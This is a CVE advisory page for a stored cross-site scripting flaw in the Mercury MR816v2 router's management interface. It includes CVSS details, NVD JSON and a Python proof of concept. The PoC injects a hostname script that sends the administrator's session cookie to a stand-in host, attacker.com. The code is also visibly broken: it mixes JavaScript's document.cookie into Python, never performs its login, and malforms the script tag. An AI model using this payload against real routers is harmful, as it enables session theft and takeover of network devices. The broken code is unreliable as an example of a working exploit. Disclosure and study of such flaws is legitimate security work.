CVE-2025-65289

Description

A stored Cross site scripting (XSS) vulnerability in the Mercury MR816v2 (081C3114 4.8.7 Build 110427 Rel 36550n) router allows a remote attacker on the LAN to inject JavaScript into the router's management UI by submitting a malicious hostname. The injected script is stored and later executed in the context of an administrator's browser (for example after DHCP release/renew triggers the interface to display the stored hostname). Because the management interface uses weak/basic authentication and does not properly protect or isolate session material, the XSS can be used to exfiltrate the admin session and perform administrative actions.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:o:mercurycom:mr816_firmware:081c3114_4.8.7:build_110427:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:mercurycom:mr816:2.0:*:*:*:*:*:*:* - NOT VULNERABLE

Mercury MR816v2 081C3114 4.8.7 Build 110427 Rel 36550n

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# CVE-2025-65289 PoC - Mercury MR816v2 Stored XSS
# Target: Mercury MR816v2 Router (Firmware 4.8.7 Build 110427 Rel 36550n)
# Attack Vector: Inject XSS payload in hostname field via LAN access

router_ip = "192.168.1.1"  # Default Mercury router IP
router_user = "admin"       # Default admin username
router_pass = "admin"       # Default admin password

# XSS payload to steal admin session
xss_payload = '<script>document.location="http://attacker.com/log?c=' + 'cookie=' + document.cookie + '&url=' + document.URL + '</script>'

def exploit_stored_xss():
    """
    Inject malicious hostname containing XSS payload
    The payload will be stored and executed when admin accesses the management interface
    """
    # Login to router management interface
    session = requests.Session()
    login_url = f"http://{router_ip}/login.cgi"
    login_data = {
        "username": router_user,
        "password": router_pass
    }
    
    # Send XSS payload in hostname field
    # Typical endpoint for DHCP client configuration
    host_config_url = f"http://{router_ip}/dhcp_client_set.cgi"
    host_config_data = {
        "hostname": xss_payload,
        "action": "save"
    }
    
    response = session.post(host_config_url, data=host_config_data)
    
    if response.status_code == 200:
        print("[+] XSS payload injected successfully!")
        print("[*] Payload will execute when admin views DHCP client list")
        print("[*] or triggers DHCP release/renew operation")
    else:
        print("[-] Failed to inject payload")

if __name__ == "__main__":
    print("CVE-2025-65289 PoC - Mercury MR816v2 Stored XSS")
    print("Target: LAN-attached Mercury MR816v2 Router")
    exploit_stored_xss()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-65289
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-65289
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-65289/
[4] VulDB https://vuldb.com/cve/CVE-2025-65289
[5] https://damiri.fr/en/cve/CVE-2025-65289

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-65289", "sourceIdentifier": "[email protected]", "published": "2025-12-09T17:15:55.727", "lastModified": "2025-12-12T14:31:38.323", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A stored Cross site scripting (XSS) vulnerability in the Mercury MR816v2 (081C3114 4.8.7 Build 110427 Rel 36550n) router allows a remote attacker on the LAN to inject JavaScript into the router's management UI by submitting a malicious hostname. The injected script is stored and later executed in the context of an administrator's browser (for example after DHCP release/renew triggers the interface to display the stored hostname). Because the management interface uses weak/basic authentication and does not properly protect or isolate session material, the XSS can be used to exfiltrate the admin session and perform administrative actions."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:mercurycom:mr816_firmware:081c3114_4.8.7:build_110427:*:*:*:*:*:*", "matchCriteriaId": "E679E997-793D-4C5A-AD18-DB222D262425"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:mercurycom:mr816:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "360C10B2-75DF-445F-B772-0A99A82E1D91"}]}]}], "references": [{"url": "https://damiri.fr/en/cve/CVE-2025-65289", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}